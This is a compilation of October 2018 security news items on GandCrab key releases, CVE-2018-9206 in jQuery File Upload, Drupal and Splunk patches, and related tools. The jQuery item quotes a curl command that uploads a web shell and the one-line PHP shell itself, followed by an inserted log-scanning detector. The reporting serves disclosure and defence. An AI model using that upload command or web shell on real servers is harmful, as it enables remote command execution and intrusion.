Syrian victims of the GandCrab ransomware can decrypt their files for free

The developers of the GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.

The authors of the infamous GandCrab ransomware have released the decryption keys for all Syrian victims in an underground cybercrime forum.


Gandcrab developers’ post – Source Bleeping Computer

The crooks decided to release the decryption keys after a Syrian Twitter user published a harrowing message asking for help after photos of his deceased children were encrypted by the ransomware.

The GandCrab developers explained that it was not their intention to infect Syrian users. Their message on the hacking forum includes a link to a zip file containing the decryption keys for Syrian victims.

“This zip file contains the readme.txt in Russian language and SY_keys.txt files.  The readme.txt file contains information on how the key file is organized and information on why the keys were released.” states Bleeping Computer.

“The most important thing is not to indicate that he will help everyone. It will help only a citizen of Syria. Because of their political situation, economic and relations with the CIS countries. We regret that we did not initially add this country to the exceptions. But at least that way we can help them now.” reads the message from the author of the ransomware.

The SY_keys.txt file includes a list of 978 decryption keys for Syrian victims whose systems have been infected with GandCrab version 1.0 through 5.0.

Syrian victims who are not included in the file can receive the decryption keys by providing the GandCrab developers with a picture of themselves, their passport, and their payment page. Providing crooks with pictures of a passport is very risky: this kind of document could be resold by the crooks or used by them for identity theft.

Experts believe that security firms will develop a decryption tool based on the released encryption keys.

Pierluigi Paganini

(Security Affairs – GandCrab ransomware, cybercrime)

The post Syrian victims of the GandCrab ransomware can decrypt their files for free appeared first on Security Affairs.

testssl.sh – Test SSL Security Including Ciphers, Protocols & Detect Flaws


testssl.sh is a free command line tool to test SSL security. It checks a server’s service on any port for the support of TLS/SSL ciphers, protocols as well as recent cryptographic flaws and more.

testssl.sh is pretty much portable/compatible. It works on every Linux, Mac OS X and FreeBSD distribution, and on MSYS2/Cygwin (slow). It is also supposed to work on any other unixoid system. A newer OpenSSL version (1.0) is recommended though.

Read the rest of testssl.sh – Test SSL Security Including Ciphers, Protocols & Detect Flaws now! Only available at Darknet.

Thousands of applications affected by a zero-day issue in jQuery File Upload plugin

A security researcher discovered a zero-day vulnerability, tracked as CVE-2018-9206, that affects older versions of the jQuery File Upload plugin since 2010.

Attackers can exploit the vulnerability to carry out several malicious activities, including defacement, exfiltration, and malware infection.

The flaw was reported by the Akamai researcher Larry Cashdollar, who explained that many other packages that include the vulnerable code may be affected.

“This package has been included in various other packages and this code included in the projects web accessible path. It’s actively being exploited in the wild,” the researcher told the plugin author.

The jQuery File Upload is a jQuery widget “with multiple file selection, drag&drop support, progress bars, validation and preview images, audio and video.”

The plugin is widely adopted by numerous server-side platforms that support standard HTML form file uploads: PHP, Python, Ruby on Rails, Java, Node.js, Go, and others.

Cashdollar discovered two PHP files named upload.php and UploadHandler.php in the package’s source, which contained the file upload code.

The files were uploaded to the files/ directory in the root path of the webserver, so the expert wrote a command line test with curl and a simple PHP shell to confirm that it was possible to upload a web shell and run commands on the server.

$ curl -F "files=@shell.php" http://example.com/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

<?php $cmd=$_GET['cmd']; system($cmd);?>

“A browser connection to the test web server with cmd=id returned the user id of the web server’s running process. I suspected this vulnerability hadn’t gone unnoticed and a quick Google search confirmed that other projects that used this code or possibly code derived from it were vulnerable. There are a few YouTube videos demonstrating the attack for similar software packages.” wrote the expert.

Every project that leverages the plugin is potentially affected. The researcher pointed out that there are a few YouTube PoC videos demonstrating the exploitation of the attack for similar software packages.

Cashdollar also published proof-of-concept (PoC) code.

The root cause of the problem is that Apache disabled support for .htaccess in version 2.3.9 to improve performance (the server doesn’t have to check for this file every time it accesses a directory) and to prevent users from overriding security features that were configured on the server.

The side effect is that the technical choice left some developers and their projects open to attacks.

To address this change and correct the file upload vulnerability (CVE-2018-9206) in Blueimp, the developer now only allows uploads of files with an image content type.
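A defender-side check for the pattern described above, as an added example that is not part of the original article or of Cashdollar's PoC: it scans access-log lines for requests to script files under an upload files/ directory and records whether the same client had POSTed to the upload endpoint earlier. The log lines are constructed samples; the function name, the regexes, the Apache combined log format and a files/ directory sitting beside the handler are assumptions.

```python
import re

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Oct/2018:10:00:01 +0000] "POST /jQuery-File-Upload-9.22.0/server/php/index.php HTTP/1.1" 200 312',
    '203.0.113.7 - - [19/Oct/2018:10:00:05 +0000] "GET /jQuery-File-Upload-9.22.0/server/php/files/shell.php?cmd=id HTTP/1.1" 200 54',
    '198.51.100.9 - - [19/Oct/2018:10:02:11 +0000] "POST /jQuery-File-Upload-9.22.0/server/php/index.php HTTP/1.1" 200 298',
    '198.51.100.9 - - [19/Oct/2018:10:02:12 +0000] "GET /jQuery-File-Upload-9.22.0/server/php/files/cat.jpg HTTP/1.1" 200 48211',
    '192.0.2.44 - - [19/Oct/2018:10:05:00 +0000] "GET /jQuery-File-Upload-9.22.0/server/php/files/x.phtml HTTP/1.1" 404 196',
]

# Fields used: client address, request method, request path, response status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Upload endpoint layout taken from the curl test in the article (server/php/).
UPLOAD_RE = re.compile(r'/server/php/(?:index\.php|upload\.php)?(?:\?|$)', re.I)
# Assumption: uploads land in a files/ directory; these extensions are
# ones a PHP-enabled server may execute instead of serving as static data.
SCRIPT_RE = re.compile(r'/files/[^?]*\.(?:php\d?|phtml|phar)(?:\?|$)', re.I)


def find_suspicious(lines):
    """Return (ip, path, status, uploaded_before) for each script request.

    uploaded_before is True when the same client got a 2xx response to a
    POST on the upload endpoint earlier in the log.
    """
    uploaders = set()
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        ip, method, path = m["ip"], m["method"], m["path"]
        status = int(m["status"])
        if method == "POST" and UPLOAD_RE.search(path) and 200 <= status < 300:
            uploaders.add(ip)
        elif SCRIPT_RE.search(path):
            findings.append((ip, path.split("?")[0], status, ip in uploaders))
    return findings


if __name__ == "__main__":
    for ip, path, status, uploaded in find_suspicious(SAMPLE_LOG):
        note = "after upload from same client" if uploaded else "no prior upload seen"
        print(f"{ip} {status} {path} ({note})")
```

A 200 response to such a request means the server answered for a script stored in the upload directory, which is the condition the removed .htaccess protection used to prevent.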

“The internet relies on many security controls every day in order to keep our systems, data, and transactions safe and secure.  If one of these controls suddenly doesn’t exist it may put security at risk unknowingly to the users and software developers relying on them.” concludes the expert.

“For software developers reviewing changes to the systems and libraries you rely on during the development of your project is a great idea as well.  In the article above a security control was removed by Apache it not only removed a security control for Blueimp’s Jquery file upload software project but most of all of the forked code branches off of it.  The vulnerability impacted many projects that depend on it from stand-alone web applications to WordPress plugins and other CMSs.”

Pierluigi Paganini

(Security Affairs – CVE-2018-9206, jQuery File Upload plugin )

The post Thousands of applications affected by a zero-day issue in jQuery File Upload plugin appeared first on Security Affairs.

10 Proven Security Awareness Tips to Implement Now



The post 10 Proven Security Awareness Tips to Implement Now appeared first on InfoSec Resources.


10 Proven Security Awareness Tips to Implement Now was first posted on October 19, 2018 at 2:52 pm.
©2017 "InfoSec Resources". Use of this feed is for personal non-commercial use only. If you are not reading this article in your feed reader, then the site is guilty of copyright infringement. Please contact me at darren.dalasta@infosecinstitute.com

Drupal dev team fixed Remote Code Execution flaws in the popular CMS

The Drupal development team has patched several vulnerabilities in versions 7 and 8 of the popular CMS, including RCE flaws.

The development team of the Drupal content management system addressed several vulnerabilities in versions 7 and 8, including some flaws that could be exploited for remote code execution.

The Drupal team fixed a critical vulnerability in the Contextual Links module, which fails to properly validate requested contextual links. The flaw could be exploited for remote code execution by an attacker whose account has the “access contextual links” permission.

“The Contextual Links module doesn’t sufficiently validate the requested contextual links.” reads the security advisory.
“This vulnerability is mitigated by the fact that an attacker must have a role with the permission “access contextual links”.”

Another critical vulnerability fixed by the development team is an injection issue that resides in the DefaultMailSystem::mail() function. The root cause of the bug is the lack of sanitization of some variables for shell arguments when sending emails.

“When sending email some variables were not being sanitized for shell arguments, which could lead to remote code execution.” continues the advisory.

The remaining vulnerabilities addressed in the CMS have been assigned a “moderately critical” rating. They include a couple of open redirect bugs and an access bypass issue related to content moderation.

The vulnerabilities have been addressed with the release of Drupal 7.60, 8.6.2 and 8.5.8.

The Drupal team urges users to install the security updates as soon as possible, as there is a concrete risk that threat actors in the wild will start to exploit the flaws in massive hacking campaigns.

Pierluigi Paganini

(Security Affairs – Drupal, hacking)

The post Drupal dev team fixed Remote Code Execution flaws in the popular CMS appeared first on Security Affairs.

Critical Flaw Found in Streaming Library Used by VLC and Other Media Players

Security researchers have discovered a serious code execution vulnerability in the LIVE555 Streaming Media library—which is being used by popular media players including VLC and MPlayer, along with a number of embedded devices capable of streaming media. LIVE555 streaming media, developed and maintained by Live Networks, is a set of C++ libraries companies and application developers use to

8 Popular Courses to Learn Ethical Hacking – 2018 Bundle

Update (Oct 2018) — Over 30,000 students from all around the world have joined this training program so far. Due to the growing number of threats in the computer world, ethical hackers have become the most important player for not only governments but also private companies and IT firms in order to safeguard their systems and networks from hackers trying to infiltrate them. By 2020,

Armed Services, Social Engineering and Sensationalist Reporting — CyberSpeak Podcast

On this episode of the CyberSpeak with InfoSec Institute podcast, Michel Huffaker, director of threat intelligence at ThreatQuotient, talks about cybersecurity issues facing the armed services, recent issues in the news and her thoughts on sensationalized security reporting. In the podcast, Huffaker and host Chris Sienko discuss:  What are some of the biggest security issues […]

The post Armed Services, Social Engineering and Sensationalist Reporting — CyberSpeak Podcast appeared first on InfoSec Resources.


Armed Services, Social Engineering and Sensationalist Reporting — CyberSpeak Podcast was first posted on October 19, 2018 at 8:08 am.

Splunk addressed several vulnerabilities in Enterprise and Light products

Splunk recently addressed several vulnerabilities in its Enterprise and Light products, some of which have been rated “high severity.”

The Splunk Enterprise solution allows organizations to aggregate, search, analyze, and visualize data from various sources that are critical to business operations.

Splunk Light is a comprehensive solution for small IT environments that automates log analysis and integrates server and network monitoring.

“To mitigate these issues, Splunk recommends upgrading to the latest release and applying as many of the Hardening Standards from the Securing Splunk documentation as are relevant to your environment. Splunk Enterprise and Splunk Light releases are cumulative, meaning that future releases will contain fixes to these vulnerabilities, new features and other bug fixes,” reads the advisory published by Splunk.

The most severe issue fixed by the company is a high severity cross-site scripting (XSS) flaw in the Web interface, tracked as CVE-2018-7427, that received a CVSS score of 8.1.

Another severe vulnerability is a DoS flaw, tracked as CVE-2018-7432, that could be exploited using malicious HTTP requests sent to Splunkd, the system process that handles indexing, searching and forwarding. This issue was rated “medium severity” by the company.

The company also addressed a denial-of-service (DoS) vulnerability, tracked as CVE-2018-7429, that could be exploited by an attacker by sending a specially crafted HTTP request to Splunkd.

The last flaw addressed by the vendor, tracked as CVE-2018-7431, is a path traversal issue that allows an authenticated attacker to download arbitrary files from the vendor Django app. The vulnerability has been rated “medium severity.”

The affected versions are listed below:

  • Cross Site Scripting in Splunk Web (CVE-2018-7427)
      • Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14 and Splunk Light before 6.6.0
      • Affected Components: All Splunk Enterprise components running Splunk Web.
  • Denial of Service (CVE-2018-7432)
      • Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14 and Splunk Light before 6.6.0
      • Affected Components: All Splunk Enterprise components running Splunk Web.
  • Path Traversal Vulnerability in Splunk Django App (CVE-2018-7431)
      • Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14 and Splunk Light before 6.6.0
      • Affected Components: All Splunk Enterprise components running Splunk Web.
  • Splunkd Denial of Service via Malformed HTTP Request (CVE-2018-7429)
      • Affected Product Versions: Splunk Enterprise versions 6.4.x before 6.4.8, 6.3.x before 6.3.11, 6.2.x before 6.2.14 and Splunk Light before 6.5.0
      • Affected Components: All Splunk Enterprise components running Splunk Web.

The vendor declared it has found no evidence that these vulnerabilities have been exploited in attacks in the wild.

Pierluigi Paganini

(Security Affairs – XSS, hacking)

The post Splunk addressed several vulnerabilities in Enterprise and Light products appeared first on Security Affairs.

Critical Flaws Found in Amazon FreeRTOS IoT Operating System

A security researcher has discovered several critical vulnerabilities in one of the most popular embedded real-time operating systems—called FreeRTOS—and its other variants, exposing a wide range of IoT devices and critical infrastructure systems to hackers. What is FreeRTOS (Amazon, WHIS OpenRTOS, SafeRTOS)? FreeRTOS is a leading open source real-time operating system (RTOS) for embedded